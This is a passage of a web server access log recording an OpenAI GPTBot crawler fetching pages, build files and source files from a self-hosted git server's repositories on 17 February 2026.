192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 15089] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" -[17/Feb/2026:15:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8505] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=closestduedate&state=open" -[17/Feb/2026:15:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=closestduedate&state=open" -[17/Feb/2026:15:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10208] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70893] [Gzip 29.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:15:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest" [Client 74.7.227.38] [Length 10716] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:15:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 18047] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:15:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11319] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:15:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8513] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:15:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8514] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:15:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:15:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:15:59:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" -[17/Feb/2026:15:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest" -[17/Feb/2026:15:59:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" -[17/Feb/2026:15:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest" -[17/Feb/2026:15:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest" [Client 74.7.227.38] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" -[17/Feb/2026:15:59:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest" -[17/Feb/2026:15:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest" -[17/Feb/2026:15:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" -[17/Feb/2026:15:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21355] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21356] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13691] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:15:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:15:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13099] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:15:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11665] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" -[17/Feb/2026:15:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11665] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" -[17/Feb/2026:15:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11664] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" -[17/Feb/2026:15:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fCMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 23713] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:15:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" -[17/Feb/2026:15:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13095] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:15:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13626] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10501] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:15:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:15:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10446] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11012] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:15:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10445] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:59:54 +0000] - 200 200 - 